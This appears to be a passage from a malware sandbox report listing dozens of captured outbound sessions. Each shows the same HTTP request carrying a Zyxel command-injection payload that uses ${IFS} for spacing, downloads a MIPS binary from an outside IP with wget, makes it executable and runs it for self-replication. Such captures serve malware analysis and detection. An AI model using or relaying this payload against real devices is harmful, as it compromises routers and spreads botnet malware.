                                                  Jan 19, 2024 18:23:49.938385010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3036192.168.2.1339080186.2.38.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938425064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3037192.168.2.1340246129.167.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938446999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3038192.168.2.1359016193.161.165.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938497066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3039192.168.2.1344280105.21.223.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938524961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3040192.168.2.134390081.105.170.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938549995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3041192.168.2.133850887.170.145.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938606977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3042192.168.2.1357284135.166.101.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938633919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3043192.168.2.133601645.16.23.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938680887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3044192.168.2.135868839.54.181.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938718081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3045192.168.2.135173688.220.111.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938746929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3046192.168.2.134849043.191.117.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938777924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3047192.168.2.1342130210.138.122.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938806057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3048192.168.2.13412542.27.237.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938853979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3049192.168.2.1335588198.53.104.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938884020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3050192.168.2.1335448103.88.31.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938940048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3051192.168.2.134876886.29.242.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.938958883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3052192.168.2.1350828170.72.85.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939002037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3053192.168.2.1345676182.189.41.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939057112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3054192.168.2.135795624.40.205.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939091921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3055192.168.2.1338586160.71.174.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939146996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3056192.168.2.133524696.204.123.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939182997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3057192.168.2.1355304153.251.254.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939225912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3058192.168.2.1351440222.221.132.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939249039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3059192.168.2.1347118194.45.246.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939304113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3060192.168.2.134544634.199.50.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939332008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3061192.168.2.133380852.220.170.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939384937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3062192.168.2.134048271.2.123.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939424038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3063192.168.2.1336162100.158.57.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939457893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3064192.168.2.135099223.146.126.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939507008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3065192.168.2.1360120116.148.214.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939548016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3066192.168.2.1354072144.241.203.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939585924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3067192.168.2.135315449.152.75.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939619064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3068192.168.2.1358376146.88.20.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939665079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3069192.168.2.1358236144.160.57.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939712048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3070192.168.2.1340154212.82.154.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939733028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3071192.168.2.1343398211.212.173.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939764023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3072192.168.2.134177893.48.215.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939807892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3073192.168.2.1338564114.66.212.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939855099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3074192.168.2.1359120119.52.172.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939913034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3075192.168.2.1343534189.143.232.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939940929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3076192.168.2.134195658.75.120.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.939985037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3077192.168.2.1359054153.108.177.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940015078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3078192.168.2.134186251.8.119.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940082073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3079192.168.2.1352504104.34.250.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940105915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3080192.168.2.133544249.107.150.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940135956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3081192.168.2.135852079.252.171.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940196037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3082192.168.2.1359646153.229.14.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940222979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3083192.168.2.135420060.239.254.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940248013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3084192.168.2.135037017.7.187.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940306902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3085192.168.2.133356065.244.12.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940342903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3086192.168.2.1344358104.85.91.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940371037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3087192.168.2.135307865.139.138.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940423012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3088192.168.2.1350562195.28.5.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940455914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3089192.168.2.135895025.231.104.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940500975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3090192.168.2.1344404164.204.92.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940553904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3091192.168.2.1336590103.250.218.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940582037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3092192.168.2.1350930124.238.40.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940623999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3093192.168.2.133709479.170.65.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940671921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3094192.168.2.13531305.51.186.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940732956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3095192.168.2.1341740172.167.142.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940773010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3096192.168.2.1360384210.5.54.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940819979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3097192.168.2.1351528102.183.1.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940853119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3098192.168.2.133442689.16.186.219443
                                                  TimestampBytes transferredDirectionData
